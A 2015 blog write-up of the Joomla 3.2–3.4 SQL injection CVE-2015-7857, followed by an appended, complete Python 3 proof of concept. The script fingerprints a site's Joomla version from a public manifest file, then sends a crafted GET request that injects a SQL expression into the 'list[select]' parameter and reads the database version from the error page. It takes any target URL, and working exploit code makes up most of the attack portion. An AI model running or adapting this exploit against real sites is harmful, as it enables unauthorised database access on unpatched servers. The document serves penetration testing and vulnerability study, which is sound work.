Sunday, 27 December 2015

Joomla CVE-2015-7857 writeup

(I wrote this as a 'note' on 14.12.2015, but since all of the information is already public,
below you will find a proof of concept and a short write-up of the vulnerability described in this CVE.)

A few weeks ago Asaf Orpani found a SQL injection vulnerability in the (then) latest Joomla CMS.
According to the CVE, the 3.2 through 3.4 release line is vulnerable.

Because I was involved in other projects, I found out about this CVE only a few days ago... When I saw that Asaf had published more details about possible exploitation (beyond the CVE), I wondered
whether I would be able to write a small proof-of-concept to use later during other projects.

So, let's get to work!

Trustwave SpiderLabs mentioned that:

"CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it."

Cool. ;]

I think all the technical details can be found on the SpiderLabs blog, so there is no point in copying them here again.

What we actually need is just one screenshot from Trustwave's blog: the one with the GET request.
It shows that exploitation needs nothing more than a single GET 'one liner'. We will use
Python for this. ;)

Let's write a small web client (one GET request, based on the urllib2 library).
Our goal: type an IP/hostname, press enter, and get the DB version. ;)

This case will differ a little from the one described on the SpiderLabs blog, because we don't want to wait for an admin to log in: their PoC pulls admin session data out of the database, which only pays off once an administrator has an active session. We don't need a logged-in admin on the web app/server during our pentest. ;P

Our proof-of-concept payload will inject a simple "version()" into the SQL query
by sending it in the 'list[select]' parameter of the request. On my localhost server we
will use LAMP (on Debian 8) and Joomla 3.4.4.

By the way, it would be good to know whether the Joomla found in our 'testing scope' is vulnerable or not.

I assume that you have already installed Joomla (3.4.4).
If not, unzip it and find out where (if anywhere) the installed
version is recorded:

$ grep --color -nr -e 3.4.4 ./

Below you will find a sample screen showing the strings containing 'version':

Now we see a nice XML manifest file containing the version of the Joomla installed on my box.
(It is worth mentioning that this file sits inside the web root and can be fetched by anyone. You don't need
any credentials, so it is a handy fingerprint during a pentest, and something to restrict on a hardened install.)

So let's add a few lines to our 'one liner' Python script to check whether the tested Joomla
is vulnerable or not. Sample code would look like this:
As you can see, the sqli(host) function is now commented out in the code. We only
want to see the version number. (Checking whether your Joomla installation has this file
is left as an exercise for the reader.)

Joomla 3... SQL Injection
I tried this PoC against 3.2, 3.3 and 3.4.4 installed on my box and, to be honest,
I was able to use it only against 3.4. (If you want, let me know in the comments
which version installed on your box this PoC worked against. Thanks! ;))

The modified version of this code is below:

Below is a screenshot of the test against the vulnerable Joomla 3.4.4 installed on my localhost.
A simple PoC to get the version of MySQL available on the server:
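Since the post's own scripts only survive as screenshots, here is an added example of the same two steps written in Python 3 (urllib.request instead of urllib2). It is my code, not the post's script: it fetches the public version manifest, checks whether the target sits in the 3.2 through 3.4 line, builds the one-liner GET with a SQL expression (version() by default) in the 'list[select]' parameter, and looks for a MySQL-style version string in the response. Three things are assumptions rather than facts from this page: the manifest path (administrator/manifests/files/joomla.xml), the parameters of the vulnerable view (option=com_contenthistory&view=history, the component named in the CVE advisory), and that the injected expression's value is echoed in the error page. The sample manifest and response body at the top are constructed so the parsing can be exercised offline.

```python
#!/usr/bin/env python3
"""Added example (not the post's script): Joomla version check plus
the CVE-2015-7857 'list[select]' one-liner, Python 3 / urllib.request."""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

MANIFEST_PATH = "administrator/manifests/files/joomla.xml"   # assumed location
# MySQL 5.x / MariaDB 10.x style strings such as 5.5.46-0+deb8u1 (heuristic)
DB_VERSION_RE = re.compile(r"\b(?:5|10)\.\d+\.\d+(?:-[\w.+]+)?")

# Constructed samples (shape only), so the parsing functions run offline.
SAMPLE_MANIFEST = (
    '<extension version="3.4" type="file" method="upgrade">'
    "<name>files_joomla</name><version>3.4.4</version>"
    "<description>FILES_JOOMLA_XML_DESCRIPTION</description></extension>"
)
SAMPLE_ERROR_PAGE = (
    "<html><body><h1>An error has occurred.</h1>"
    "<p>Unknown column '5.5.46-0+deb8u1' in 'field list'</p></body></html>"
)


def parse_manifest_version(manifest_xml):
    """Return the <version> text of a Joomla manifest, or None if unusable."""
    try:
        root = ET.fromstring(manifest_xml)
    except ET.ParseError:
        return None
    node = root.find("version")
    if node is None or not node.text:
        return None
    return node.text.strip()


def in_affected_line(version):
    """True for the 3.2 .. 3.4 release line the CVE covers.

    Deliberately coarse: it keys on major.minor only, so it cannot tell a
    patched 3.4 build from an unpatched one. The injection attempt decides.
    """
    parts = re.findall(r"\d+", version)
    if len(parts) < 2:
        return False
    major, minor = int(parts[0]), int(parts[1])
    return major == 3 and 2 <= minor <= 4


def sqli_url(base_url, expr="version()"):
    """Build the one-liner GET with expr injected into list[select] (URL-encoded)."""
    params = [
        ("option", "com_contenthistory"),   # assumed vulnerable component/view
        ("view", "history"),
        ("list[ordering]", ""),
        ("item_id", "1"),
        ("type_id", "1"),
        ("list[select]", expr),             # the injection point
    ]
    return base_url.rstrip("/") + "/index.php?" + urllib.parse.urlencode(params)


def extract_db_version(body):
    """First MySQL-looking version string in the response body, or None."""
    match = DB_VERSION_RE.search(body)
    return match.group(0) if match else None


def fetch(url, timeout=10):
    """Plain GET. Error responses still return their body: that is where the value shows up."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def main(base_url):
    joomla = parse_manifest_version(fetch(base_url.rstrip("/") + "/" + MANIFEST_PATH))
    print("Joomla version from manifest:", joomla or "unknown")
    if joomla and not in_affected_line(joomla):
        print("Not in the 3.2-3.4 line, skipping the injection request.")
        return
    db = extract_db_version(fetch(sqli_url(base_url)))
    print("DB version:", db or "not found in response")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "http://localhost/joomla")
```

Usage: `python3 joomla_poc.py http://192.168.56.101/joomla`. The version check is only a hint; a site with a manifest in the affected line may already be patched, and a site that blocks the manifest may still be injectable, so the GET with 'list[select]' is the actual test. Keep this to hosts in scope.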
